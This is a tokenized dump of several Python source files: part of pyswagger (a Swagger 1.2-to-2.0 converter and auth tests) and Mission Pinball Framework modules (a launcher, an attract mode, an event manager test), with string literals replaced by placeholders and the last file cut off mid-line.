== '<STR_LIT>' : <EOL> dst . update_field ( name , float ( v ) ) <EOL> else : <EOL> raise SchemaError ( '<STR_LIT>' . format ( src . type ) ) <EOL> else : <EOL> dst . update_field ( name , None ) <EOL> _from_str ( '<STR_LIT>' ) <EOL> _from_str ( '<STR_LIT>' ) <EOL> def convert_schema_from_datatype ( obj , scope , sep , app ) : <EOL> if obj == None : <EOL> return None <EOL> s = objects . Schema ( NullContext ( ) ) <EOL> update_type_and_ref ( s , obj , scope , sep , app ) <EOL> s . update_field ( '<STR_LIT>' , obj . format ) <EOL> if obj . is_set ( '<STR_LIT>' ) : <EOL> s . update_field ( '<STR_LIT:default>' , obj . defaultValue ) <EOL> convert_min_max ( s , obj ) <EOL> s . update_field ( '<STR_LIT>' , obj . uniqueItems ) <EOL> s . update_field ( '<STR_LIT>' , obj . enum ) <EOL> if obj . items : <EOL> i = objects . Schema ( NullContext ( ) ) <EOL> update_type_and_ref ( i , obj . items , scope , sep , app ) <EOL> i . update_field ( '<STR_LIT>' , obj . items . format ) <EOL> s . update_field ( '<STR_LIT>' , i ) <EOL> return s <EOL> def convert_items ( o , app ) : <EOL> item = objects . Items ( NullContext ( ) ) <EOL> if getattr ( o , '<STR_LIT>' ) : <EOL> raise SchemaError ( '<STR_LIT>' ) <EOL> if not app . prim_factory . is_primitive ( getattr ( o , '<STR_LIT:type>' , None ) ) : <EOL> raise SchemaError ( '<STR_LIT>' ) <EOL> item . update_field ( '<STR_LIT:type>' , o . type . lower ( ) ) <EOL> item . update_field ( '<STR_LIT>' , o . format ) <EOL> return item <EOL> class Upgrade ( object ) : <EOL> """<STR_LIT>""" <EOL> class Disp ( Dispatcher ) : pass <EOL> def __init__ ( self , sep = private . SCOPE_SEPARATOR ) : <EOL> self . __swagger = None <EOL> self . __sep = sep <EOL> @ Disp . register ( [ ResourceList ] ) <EOL> def _resource_list ( self , path , obj , app ) : <EOL> o = objects . Swagger ( NullContext ( ) ) <EOL> info = objects . Info ( NullContext ( ) ) <EOL> info . update_field ( '<STR_LIT:version>' , obj . apiVersion ) <EOL> info . update_field ( '<STR_LIT:title>' , get_or_none ( obj , '<STR_LIT:info>' , '<STR_LIT:title>' ) ) <EOL> info . update_field ( '<STR_LIT:description>' , get_or_none ( obj , '<STR_LIT:info>' , '<STR_LIT:description>' ) ) <EOL> info . update_field ( '<STR_LIT>' , get_or_none ( obj , '<STR_LIT:info>' , '<STR_LIT>' ) ) <EOL> if obj . info . contact : <EOL> contact = objects . Contact ( NullContext ( ) ) <EOL> contact . update_field ( '<STR_LIT:email>' , get_or_none ( obj , '<STR_LIT:info>' , '<STR_LIT>' ) ) <EOL> info . update_field ( '<STR_LIT>' , contact ) <EOL> if obj . info . license or obj . info . licenseUrl : <EOL> license = objects . License ( NullContext ( ) ) <EOL> license . update_field ( '<STR_LIT:name>' , get_or_none ( obj , '<STR_LIT:info>' , '<STR_LIT>' ) ) <EOL> license . update_field ( '<STR_LIT:url>' , get_or_none ( obj , '<STR_LIT:info>' , '<STR_LIT>' ) ) <EOL> info . update_field ( '<STR_LIT>' , license ) <EOL> o . update_field ( '<STR_LIT:info>' , info ) <EOL> o . update_field ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> o . update_field ( '<STR_LIT>' , [ '<STR_LIT:http>' , '<STR_LIT>' ] ) <EOL> o . update_field ( '<STR_LIT:host>' , '<STR_LIT>' ) <EOL> o . update_field ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> o . update_field ( '<STR_LIT>' , [ ] ) <EOL> o . update_field ( '<STR_LIT>' , { } ) <EOL> o . update_field ( '<STR_LIT>' , { } ) <EOL> o . update_field ( '<STR_LIT>' , { } ) <EOL> o . update_field ( '<STR_LIT>' , { } ) <EOL> o . update_field ( '<STR_LIT>' , [ ] ) <EOL> o . update_field ( '<STR_LIT>' , { } ) <EOL> o . update_field ( '<STR_LIT>' , [ ] ) <EOL> o . update_field ( '<STR_LIT:produces>' , [ ] ) <EOL> self . __swagger = o <EOL> @ Disp . register ( [ Resource ] ) <EOL> def _resource ( self , path , obj , app ) : <EOL> name = obj . get_name ( path ) <EOL> for t in self . __swagger . tags : <EOL> if t . name == name : <EOL> break <EOL> else : <EOL> tt = objects . Tag ( NullContext ( ) ) <EOL> tt . update_field ( '<STR_LIT:name>' , name ) <EOL> self . __swagger . tags . append ( tt ) <EOL> @ Disp . register ( [ Operation ] ) <EOL> def _operation ( self , path , obj , app ) : <EOL> o = objects . Operation ( NullContext ( ) ) <EOL> scope = obj . _parent_ . get_name ( path ) <EOL> o . update_field ( '<STR_LIT>' , [ scope ] ) <EOL> o . update_field ( '<STR_LIT>' , obj . nickname ) <EOL> o . update_field ( '<STR_LIT>' , obj . summary ) <EOL> o . update_field ( '<STR_LIT:description>' , obj . notes ) <EOL> o . update_field ( '<STR_LIT>' , obj . deprecated == '<STR_LIT:true>' ) <EOL> c = obj . consumes if obj . consumes and len ( obj . consumes ) > <NUM_LIT:0> else obj . _parent_ . consumes <EOL> o . update_field ( '<STR_LIT>' , c if c else [ ] ) <EOL> p = obj . produces if obj . produces and len ( obj . produces ) > <NUM_LIT:0> else obj . _parent_ . produces <EOL> o . update_field ( '<STR_LIT:produces>' , p if p else [ ] ) <EOL> o . update_field ( '<STR_LIT>' , [ ] ) <EOL> o . update_field ( '<STR_LIT>' , [ ] ) <EOL> _auth = obj . authorizations if obj . authorizations and len ( obj . authorizations ) > <NUM_LIT:0> else obj . _parent_ . authorizations <EOL> if _auth : <EOL> for name , scopes in six . iteritems ( _auth ) : <EOL> o . security . append ( { name : [ v . scope for v in scopes ] } ) <EOL> o . update_field ( '<STR_LIT>' , { } ) <EOL> resp = objects . Response ( NullContext ( ) ) <EOL> if obj . type != '<STR_LIT>' : <EOL> resp . update_field ( '<STR_LIT>' , convert_schema_from_datatype ( obj , scope , self . __sep , app ) ) <EOL> o . responses [ '<STR_LIT:default>' ] = resp <EOL> path = obj . _parent_ . basePath + obj . path <EOL> if path not in self . __swagger . paths : <EOL> self . __swagger . paths [ path ] = objects . PathItem ( NullContext ( ) ) <EOL> method = obj . method . lower ( ) <EOL> self . __swagger . paths [ path ] . update_field ( method , o ) <EOL> @ Disp . register ( [ Authorization ] ) <EOL> def _authorization ( self , path , obj , app ) : <EOL> o = objects . SecurityScheme ( NullContext ( ) ) <EOL> if obj . type == '<STR_LIT>' : <EOL> o . update_field ( '<STR_LIT:type>' , '<STR_LIT>' ) <EOL> else : <EOL> o . update_field ( '<STR_LIT:type>' , obj . type ) <EOL> o . update_field ( '<STR_LIT>' , { } ) <EOL> for s in obj . scopes or [ ] : <EOL> o . scopes [ s . scope ] = s . description <EOL> if o . type == '<STR_LIT>' : <EOL> o . update_field ( '<STR_LIT>' , get_or_none ( obj , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:url>' ) ) <EOL> o . update_field ( '<STR_LIT>' , get_or_none ( obj , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:url>' ) ) <EOL> if o . authorizationUrl : <EOL> o . update_field ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> elif o . tokenUrl : <EOL> o . update_field ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> elif o . type == '<STR_LIT>' : <EOL> o . update_field ( '<STR_LIT:name>' , obj . keyname ) <EOL> o . update_field ( '<STR_LIT>' , obj . passAs ) <EOL> self . __swagger . securityDefinitions [ obj . get_name ( path ) ] = o <EOL> @ Disp . register ( [ Parameter ] ) <EOL> def _parameter ( self , path , obj , app ) : <EOL> o = objects . Parameter ( NullContext ( ) ) <EOL> scope = obj . _parent_ . _parent_ . get_name ( path ) <EOL> o . update_field ( '<STR_LIT:name>' , obj . name ) <EOL> o . update_field ( '<STR_LIT>' , obj . required ) <EOL> o . update_field ( '<STR_LIT:description>' , obj . description ) <EOL> if obj . paramType == '<STR_LIT>' : <EOL> o . update_field ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> o . update_field ( '<STR_LIT>' , obj . paramType ) <EOL> if '<STR_LIT:body>' == getattr ( o , '<STR_LIT>' ) : <EOL> o . update_field ( '<STR_LIT>' , convert_schema_from_datatype ( obj , scope , self . __sep , app ) ) <EOL> else : <EOL> if getattr ( obj , '<STR_LIT>' ) : <EOL> raise SchemaError ( '<STR_LIT>' ) <EOL> if obj . allowMultiple == True and obj . items == None : <EOL> o . update_field ( '<STR_LIT:type>' , '<STR_LIT>' ) <EOL> o . update_field ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> o . update_field ( '<STR_LIT>' , obj . uniqueItems ) <EOL> o . update_field ( '<STR_LIT>' , convert_items ( obj , app ) ) <EOL> if obj . is_set ( "<STR_LIT>" ) : <EOL> o . update_field ( '<STR_LIT:default>' , [ obj . defaultValue ] ) <EOL> o . items . update_field ( '<STR_LIT>' , obj . enum ) <EOL> else : <EOL> o . update_field ( '<STR_LIT:type>' , obj . type . lower ( ) ) <EOL> o . update_field ( '<STR_LIT>' , obj . format ) <EOL> if obj . is_set ( "<STR_LIT>" ) : <EOL> o . update_field ( '<STR_LIT:default>' , obj . defaultValue ) <EOL> convert_min_max ( o , obj ) <EOL> o . update_field ( '<STR_LIT>' , obj . enum ) <EOL> if obj . items : <EOL> o . update_field ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> o . update_field ( '<STR_LIT>' , obj . uniqueItems ) <EOL> o . update_field ( '<STR_LIT>' , convert_items ( obj . items , app ) ) <EOL> path = obj . _parent_ . _parent_ . basePath + obj . _parent_ . path <EOL> method = obj . _parent_ . method . lower ( ) <EOL> op = getattr ( self . __swagger . paths [ path ] , method ) <EOL> op . parameters . append ( o ) <EOL> @ Disp . register ( [ Model ] ) <EOL> def _model ( self , path , obj , app ) : <EOL> scope = obj . _parent_ . get_name ( path ) <EOL> s = scope_compose ( scope , obj . get_name ( path ) , sep = self . __sep ) <EOL> o = self . __swagger . definitions . get ( s , None ) <EOL> if not o : <EOL> o = objects . Schema ( NullContext ( ) ) <EOL> self . __swagger . definitions [ s ] = o <EOL> props = { } <EOL> for name , prop in six . iteritems ( obj . properties ) : <EOL> props [ name ] = convert_schema_from_datatype ( prop , scope , self . __sep , app ) <EOL> props [ name ] . update_field ( '<STR_LIT:description>' , prop . description ) <EOL> o . update_field ( '<STR_LIT>' , props ) <EOL> o . update_field ( '<STR_LIT>' , obj . required ) <EOL> o . update_field ( '<STR_LIT>' , obj . discriminator ) <EOL> o . update_field ( '<STR_LIT:description>' , obj . description ) <EOL> for t in obj . subTypes or [ ] : <EOL> sub_s = scope_compose ( scope , t , sep = self . __sep ) <EOL> sub_o = self . __swagger . definitions . get ( sub_s , None ) <EOL> if not sub_o : <EOL> sub_o = objects . Schema ( NullContext ( ) ) <EOL> self . __swagger . definitions [ sub_s ] = sub_o <EOL> new_ref = objects . Schema ( NullContext ( ) ) <EOL> new_ref . update_field ( '<STR_LIT>' , '<STR_LIT>' + s ) <EOL> sub_o . allOf . append ( new_ref ) <EOL> @ property <EOL> def swagger ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . __swagger : <EOL> return None <EOL> common_path = os . path . commonprefix ( self . __swagger . paths . keys ( ) ) <EOL> common_path = common_path [ : - <NUM_LIT:1> ] if common_path [ - <NUM_LIT:1> ] == '<STR_LIT:/>' else common_path <EOL> if len ( common_path ) > <NUM_LIT:0> : <EOL> p = six . moves . urllib . parse . urlparse ( common_path ) <EOL> self . __swagger . update_field ( '<STR_LIT:host>' , p . netloc ) <EOL> new_common_path = six . moves . urllib . parse . urlunparse ( ( <EOL> p . scheme , p . netloc , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> new_path = { } <EOL> for k in self . __swagger . paths . keys ( ) : <EOL> new_path [ k [ len ( new_common_path ) : ] ] = self . __swagger . paths [ k ] <EOL> self . __swagger . update_field ( '<STR_LIT>' , new_path ) <EOL> return self . __swagger </s>
<s> from pyswagger import SwaggerApp , SwaggerSecurity <EOL> from . . utils import get_test_data_folder <EOL> import unittest <EOL> app = SwaggerApp . _create_ ( get_test_data_folder ( version = '<STR_LIT>' , which = '<STR_LIT>' ) ) <EOL> class BasicAuthAndApiKeyTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . s = SwaggerSecurity ( app ) <EOL> self . s . update_with ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . s . update_with ( '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . s . update_with ( '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . s . update_with ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_deleteUser ( self ) : <EOL> """<STR_LIT>""" <EOL> req , _ = app . op [ '<STR_LIT>' ] ( username = '<STR_LIT>' ) <EOL> self . s ( req ) . prepare ( ) <EOL> self . assertTrue ( '<STR_LIT>' in req . header ) <EOL> self . assertEqual ( req . header [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_getUserByName ( self ) : <EOL> """<STR_LIT>""" <EOL> req , _ = app . op [ '<STR_LIT>' ] ( username = '<STR_LIT>' ) <EOL> self . s ( req ) . prepare ( ) <EOL> qk = [ x for x in req . query if x [ <NUM_LIT:0> ] == '<STR_LIT>' ] <EOL> self . assertTrue ( len ( qk ) > <NUM_LIT:0> ) <EOL> self . assertEqual ( qk [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> def test_createUser ( self ) : <EOL> """<STR_LIT>""" <EOL> req , _ = app . op [ '<STR_LIT>' ] ( body = dict ( id = <NUM_LIT:0> , username = '<STR_LIT>' , firstName = '<STR_LIT>' , lastName = '<STR_LIT>' ) ) <EOL> self . s ( req ) . prepare ( ) <EOL> self . assertTrue ( '<STR_LIT>' in req . header ) <EOL> self . assertEqual ( req . header [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_getAllUsers ( self ) : <EOL> """<STR_LIT>""" <EOL> req , _ = app . op [ '<STR_LIT>' ] ( ) <EOL> self . s ( req ) . prepare ( ) <EOL> self . assertTrue ( '<STR_LIT>' in req . header ) <EOL> self . assertEqual ( req . header [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> class NoAuthProvidedTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . s = SwaggerSecurity ( app ) <EOL> def test_deleteUser ( self ) : <EOL> """<STR_LIT>""" <EOL> req , _ = app . op [ '<STR_LIT>' ] ( username = '<STR_LIT>' ) <EOL> self . s ( req ) . prepare ( ) <EOL> self . assertFalse ( '<STR_LIT>' in req . header ) <EOL> def test_getUserByName ( self ) : <EOL> """<STR_LIT>""" <EOL> req , _ = app . op [ '<STR_LIT>' ] ( username = '<STR_LIT>' ) <EOL> self . s ( req ) . prepare ( ) <EOL> self . assertFalse ( '<STR_LIT>' in req . query ) <EOL> def test_createUser ( self ) : <EOL> """<STR_LIT>""" <EOL> req , _ = app . op [ '<STR_LIT>' ] ( body = dict ( id = <NUM_LIT:0> , username = '<STR_LIT>' , firstName = '<STR_LIT>' , lastName = '<STR_LIT>' ) ) <EOL> self . s ( req ) . prepare ( ) <EOL> self . assertFalse ( '<STR_LIT>' in req . header ) <EOL> def test_getAllUsers ( self ) : <EOL> """<STR_LIT>""" <EOL> req , _ = app . op [ '<STR_LIT>' ] ( ) <EOL> self . s ( req ) . prepare ( ) <EOL> self . assertFalse ( '<STR_LIT>' in req . header ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> from datetime import datetime <EOL> import socket <EOL> import os <EOL> import argparse <EOL> import errno <EOL> import version <EOL> import sys <EOL> from mpf . system . machine import MachineController <EOL> from mpf . system . utility_functions import Util <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' ) <EOL> parser . add_argument ( "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT:-c>" , <EOL> action = "<STR_LIT:store>" , dest = "<STR_LIT>" , <EOL> default = "<STR_LIT>" , metavar = '<STR_LIT>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> action = "<STR_LIT>" , dest = "<STR_LIT>" , const = logging . DEBUG , <EOL> default = logging . INFO , help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , dest = "<STR_LIT>" , <EOL> default = logging . INFO , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> action = "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> const = '<STR_LIT>' , help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> action = "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> const = '<STR_LIT>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> action = "<STR_LIT>" , dest = "<STR_LIT>" , default = True , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> action = "<STR_LIT:store>" , dest = "<STR_LIT>" , metavar = '<STR_LIT>' , <EOL> default = os . path . join ( "<STR_LIT>" , datetime . now ( ) . strftime ( <EOL> "<STR_LIT>" + socket . gethostname ( ) + "<STR_LIT>" ) ) , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> action = "<STR_LIT:store>" , dest = "<STR_LIT>" , <EOL> default = os . path . join ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> metavar = '<STR_LIT>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> action = "<STR_LIT:version>" , version = version . version_str , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> args = parser . parse_args ( ) <EOL> args . configfile = Util . string_to_list ( args . configfile ) <EOL> try : <EOL> os . makedirs ( '<STR_LIT>' ) <EOL> except OSError as exception : <EOL> if exception . errno != errno . EEXIST : <EOL> raise <EOL> logging . basicConfig ( level = args . loglevel , <EOL> format = '<STR_LIT>' , <EOL> filename = args . logfile , <EOL> filemode = '<STR_LIT:w>' ) <EOL> console = logging . StreamHandler ( ) <EOL> console . setLevel ( args . consoleloglevel ) <EOL> formatter = logging . Formatter ( '<STR_LIT>' ) <EOL> console . setFormatter ( formatter ) <EOL> logging . getLogger ( '<STR_LIT>' ) . addHandler ( console ) <EOL> def main ( ) : <EOL> try : <EOL> machine = MachineController ( vars ( args ) ) <EOL> machine . run ( ) <EOL> logging . info ( "<STR_LIT>" ) <EOL> except Exception , e : <EOL> logging . exception ( e ) <EOL> sys . exit ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> from version import __version__ </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> from mpf . system . mode import Mode <EOL> import time <EOL> class Attract ( Mode ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , machine , config , name , path ) : <EOL> super ( Attract , self ) . __init__ ( machine , config , name , path ) <EOL> self . start_button_pressed_time = <NUM_LIT:0.0> <EOL> self . start_hold_time = <NUM_LIT:0.0> <EOL> self . start_buttons_held = list ( ) <EOL> self . assets_waiting = <NUM_LIT:0> <EOL> def mode_start ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> for switch in self . machine . switches . items_tagged ( <EOL> self . machine . config [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) : <EOL> self . switch_handlers . append ( <EOL> self . machine . switch_controller . add_switch_handler ( <EOL> switch . name , self . start_button_pressed , <NUM_LIT:1> ) ) <EOL> self . switch_handlers . append ( <EOL> self . machine . switch_controller . add_switch_handler ( <EOL> switch . name , self . start_button_released , <NUM_LIT:0> ) ) <EOL> if hasattr ( self . machine , '<STR_LIT>' ) : <EOL> self . machine . ball_controller . collect_balls ( ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> def start_button_pressed ( self ) : <EOL> """<STR_LIT>""" <EOL> self . start_button_pressed_time = time . time ( ) <EOL> def start_button_released ( self ) : <EOL> """<STR_LIT>""" <EOL> self . start_hold_time = time . time ( ) - self . start_button_pressed_time <EOL> self . start_buttons_held = list ( ) <EOL> for switch in self . machine . switches . items_tagged ( '<STR_LIT>' ) : <EOL> if self . machine . switch_controller . is_active ( switch . name ) : <EOL> self . start_buttons_held . append ( switch . name ) <EOL> self . machine . events . post_boolean ( '<STR_LIT>' , <EOL> callback = self . result_of_start_request ) <EOL> def result_of_start_request ( self , ev_result = True ) : <EOL> """<STR_LIT>""" <EOL> if ev_result is False : <EOL> self . log . debug ( "<STR_LIT>" ) <EOL> else : <EOL> self . log . debug ( "<STR_LIT>" ) <EOL> self . machine . events . post ( '<STR_LIT>' , <EOL> buttons = self . start_buttons_held , <EOL> hold_time = self . start_hold_time ) </s>
<s> class ConfigParser ( object ) : <EOL> machine_wide_config = False <EOL> mode_config = False <EOL> config_section = '<STR_LIT>' <EOL> def __init__ ( self , machine ) : <EOL> self . machine = machine </s>
<s> from MpfTestCase import MpfTestCase <EOL> class TestEventManager ( MpfTestCase ) : <EOL> def __init__ ( self , test_map ) : <EOL> super ( TestEventManager , self ) . __init__ ( test_map ) <EOL> self . _handler1_args = tuple ( ) <EOL> self . _handler1_kwargs = dict ( ) <EOL> self . _handler1_called = <NUM_LIT:0> <EOL> self . _handler2_args = tuple ( ) <EOL> self . _handler2_kwargs = dict ( ) <EOL> self . _handler2_called = <NUM_LIT:0> <EOL> self . _handlers_called = list ( ) <EOL> self . _handler_returns_false_args = tuple ( ) <EOL> self . _handler_returns_false_kwargs = dict ( ) <EOL> self . _handler_returns_false_called = <NUM_LIT:0> <EOL> self . _relay1_called = <NUM_LIT:0> <EOL> self . _relay2_called = <NUM_LIT:0> <EOL> self . _relay_callback_args = tuple ( ) <EOL> self . _relay_callback_kwargs = dict ( ) <EOL> self . _relay_callback_called = <NUM_LIT:0> <EOL> self . _callback_args = tuple ( ) <EOL> self . _callback_kwargs = dict ( ) <EOL> self . _callback_called = <NUM_LIT:0> <EOL> self . _queue = None <EOL> self . _queue_callback_args = tuple ( ) <EOL> self . _queue_callback_kwargs = dict ( ) <EOL> self . _queue_callback_called = <NUM_LIT:0> <EOL> def getConfigFile ( self ) : <EOL> return '<STR_LIT>' <EOL> def getMachinePath ( self ) : <EOL> return '<STR_LIT>' <EOL> def event_handler1 ( self , * args , ** kwargs ) : <EOL> self . _handler1_args = args <EOL> self . _handler1_kwargs = kwargs <EOL> self . _handler1_called += <NUM_LIT:1> <EOL> self . _handlers_called . append ( self . event_handler1 ) <EOL> def event_handler2 ( self , * args , ** kwargs ) : <EOL> self . _handler2_args = args <EOL> self . _handler2_kwargs = kwargs <EOL> self . _handler2_called += <NUM_LIT:1> <EOL> self . _handlers_called . append ( self . event_handler2 ) <EOL> def event_handler_returns_false ( self , * args , ** kwargs ) : <EOL> self . _handler_returns_false_args = args <EOL> self . _handler_returns_false_kwargs = kwargs <EOL> self . _handler_returns_false_called += <NUM_LIT:1> <EOL> self . _handlers_called . append ( self . event_handler_returns_false ) <EOL> return False <EOL> def event_handler_relay1 ( self , relay_test ) : <EOL> self . _relay1_called += <NUM_LIT:1> <EOL> self . _handlers_called . append ( self . event_handler_relay1 ) <EOL> return { '<STR_LIT>' : relay_test } <EOL> def event_handler_relay2 ( self , relay_test ) : <EOL> self . _relay2_called += <NUM_LIT:1> <EOL> self . _handlers_called . append ( self . event_handler_relay2 ) <EOL> return { '<STR_LIT>' : relay_test - <NUM_LIT:1> } <EOL> def callback ( self , * args , ** kwargs ) : <EOL> self . _callback_args = args <EOL> self . _callback_kwargs = kwargs <EOL> self . _callback_called += <NUM_LIT:1> <EOL> self . _handlers_called . append ( self . callback ) <EOL> def relay_callback ( self , * args , ** kwargs ) : <EOL> self . _relay_callback_args = args <EOL> self . _relay_callback_kwargs = kwargs <EOL> self . _relay_callback_called += <NUM_LIT:1> <EOL> self . _handlers_called . append ( self . relay_callback ) <EOL> def event_handler_calls_second_event ( self ) : <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . _handlers_called . append ( self . event_handler_calls_second_event ) <EOL> def event_handler_add_queue ( self , queue ) : <EOL> self . _handlers_called . append ( self . event_handler_add_queue ) <EOL> self . _queue = queue <EOL> self . _queue . wait ( ) <EOL> def event_handler_add_quick_queue ( self , queue ) : <EOL> self . _handlers_called . append ( self . event_handler_add_quick_queue ) <EOL> self . _queue = queue <EOL> self . _queue . wait ( ) <EOL> self . _queue . clear ( ) <EOL> def event_handler_clear_queue ( self ) : <EOL> self . _handlers_called . append ( self . event_handler_clear_queue ) <EOL> self . _queue . clear ( ) <EOL> def queue_callback ( self , * args , ** kwargs ) : <EOL> self . _queue_callback_args = args <EOL> self . _queue_callback_kwargs = kwargs <EOL> self . _queue_callback_called += <NUM_LIT:1> <EOL> self . _handlers_called . append ( self . queue_callback ) <EOL> def test_event ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler1 ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler1_kwargs ) <EOL> def test_event_with_kwargs ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler1 ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post ( '<STR_LIT>' , test1 = '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( { '<STR_LIT>' : '<STR_LIT>' } , self . _handler1_kwargs ) <EOL> def test_event_with_callback ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler1 ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post ( '<STR_LIT>' , test1 = '<STR_LIT>' , <EOL> callback = self . callback ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _callback_called ) <EOL> def test_nested_callbacks ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , <EOL> self . event_handler_calls_second_event ) <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler1 ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post ( '<STR_LIT>' , callback = self . callback ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( self . _handlers_called [ <NUM_LIT:0> ] , <EOL> self . event_handler_calls_second_event ) <EOL> self . assertEquals ( self . _handlers_called [ <NUM_LIT:1> ] , <EOL> self . event_handler1 ) <EOL> self . assertEquals ( self . _handlers_called [ <NUM_LIT:2> ] , <EOL> self . callback ) <EOL> def test_event_handler_priorities ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler1 , <EOL> priority = <NUM_LIT:100> ) <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler2 , <EOL> priority = <NUM_LIT:200> ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler1_kwargs ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler2_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler2_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler2_kwargs ) <EOL> self . assertEquals ( self . _handlers_called [ <NUM_LIT:0> ] , self . event_handler2 ) <EOL> self . assertEquals ( self . _handlers_called [ <NUM_LIT:1> ] , self . event_handler1 ) <EOL> def test_remove_handler_by_handler ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler1 ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler1_kwargs ) <EOL> self . machine . events . remove_handler ( self . event_handler1 ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler1_kwargs ) <EOL> def test_remove_handler_by_event ( self ) : <EOL> self . machine . 